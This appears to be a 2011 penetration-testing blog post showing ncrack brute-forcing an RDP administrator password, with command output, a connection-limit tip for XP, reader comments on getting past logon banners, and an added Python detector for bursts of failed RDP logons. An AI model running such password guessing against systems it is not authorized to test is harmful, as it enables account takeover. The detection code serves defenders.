Wednesday, February 9, 2011

Move over tsgrinder/tscrack, hello ncrack!

So thanks to mubix for telling me that ncrack now supports RDP. Very cool stuff.

user@ubuntu:~/pentest/ncrack$ ncrack -vv -d7 --user administrator,CL=10

Fetchfile found /usr/local/share/ncrack/default.pwd

Starting Ncrack 0.3ALPHA ( ) at 2011-02-09 15:28 PST

rdp:// (EID 1) Login failed: 'administrator' '123456'
rdp:// (EID 1) Attempts: total 1 completed 1 supported 1 --- rate 0.96
rdp:// (EID 1518) Login failed: 'administrator' 'pitbull'
rdp:// (EID 1518) Attempts: total 1519 completed 1513 supported 1 --- rate 3.10
rdp:// (EID 1520) Login failed: 'administrator' 'geraldine'
rdp:// (EID 1520) Attempts: total 1520 completed 1514 supported 1 --- rate 3.17
rdp:// (EID 1522) Login failed: 'administrator' 'allstar'
rdp:// last: 0.00 current 0.00 parallelism 10
rdp:// Increasing connection limit to: 10
rdp:// (EID 1522) Attempts: total 1521 completed 1515 supported 1 --- rate 3.00

Keep in mind that against XP you can only have one connection at a time, so you'll have to set your Connection Limit value to 1 (CL=1).
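On the target's side, a run like the one above appears as a stream of failed RDP logons for one account from one source, roughly three per second in this output. As an added example (not part of the original post), the Python below flags that pattern over failed-logon records; the space-separated record format, the sample data, the addresses and the thresholds are assumptions made for illustration, while the event IDs and logon types are the standard Windows ones.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Failed-logon event IDs: 4625 (Vista/2008 and later), 529 (XP/2003 bad password).
FAILED_LOGON = {"4625", "529"}
# Logon type 10 = RemoteInteractive (RDP); 3 = Network, seen when RDP uses NLA.
RDP_LOGON_TYPES = {"10", "3"}

def parse(line):
    """Parse one record in the assumed format: time id logon_type account source."""
    ts, event_id, logon_type, account, source = line.split()
    return datetime.fromisoformat(ts), event_id, logon_type, account.lower(), source

def detect_guessing(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {(source, account): peak failure count} for every pair that
    reached `threshold` failed RDP logons inside one sliding `window`."""
    recent = defaultdict(deque)  # (source, account) -> failure times in window
    flagged = {}
    for line in filter(str.strip, lines):
        ts, event_id, logon_type, account, source = parse(line)
        if event_id not in FAILED_LOGON or logon_type not in RDP_LOGON_TYPES:
            continue
        key = (source, account)
        times = recent[key]
        times.append(ts)
        while ts - times[0] > window:  # expire failures older than the window
            times.popleft()
        if len(times) >= threshold:
            flagged[key] = max(flagged.get(key, 0), len(times))
    return flagged

def build_sample(rate_per_sec=3, attempts=30):
    """Constructed data: one source guessing 'administrator' at a fixed rate,
    plus a real user who mistypes twice and then logs in (event 4624)."""
    start = datetime(2011, 2, 9, 15, 28, 0)
    lines = [
        f"{(start + timedelta(seconds=i / rate_per_sec)).isoformat()}"
        " 4625 10 administrator 192.0.2.10"
        for i in range(attempts)
    ]
    lines += [
        "2011-02-09T15:28:02 4625 10 jsmith 198.51.100.7",
        "2011-02-09T15:28:20 4625 10 jsmith 198.51.100.7",
        "2011-02-09T15:28:41 4624 10 jsmith 198.51.100.7",
    ]
    return sorted(lines)  # ISO timestamps sort chronologically as text

if __name__ == "__main__":
    for (source, account), peak in detect_guessing(build_sample()).items():
        print(f"{source} -> {account}: {peak} failed RDP logons within 60s")
```

A slower, single-connection run such as the CL=1 case can stay under these defaults, so pair the short window with a longer one (for example `window=timedelta(minutes=10)`).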


Anonymous said...

CG, was wondering if you know of any new tools that will BF/Audit RDP when a warning/logon banner is set from the server?

Appears ncrack cannot get past this, tsgrinder has similar limitations, as does the foofus patch for rdesktop.


CG said...

Sorry Jeff, I don't.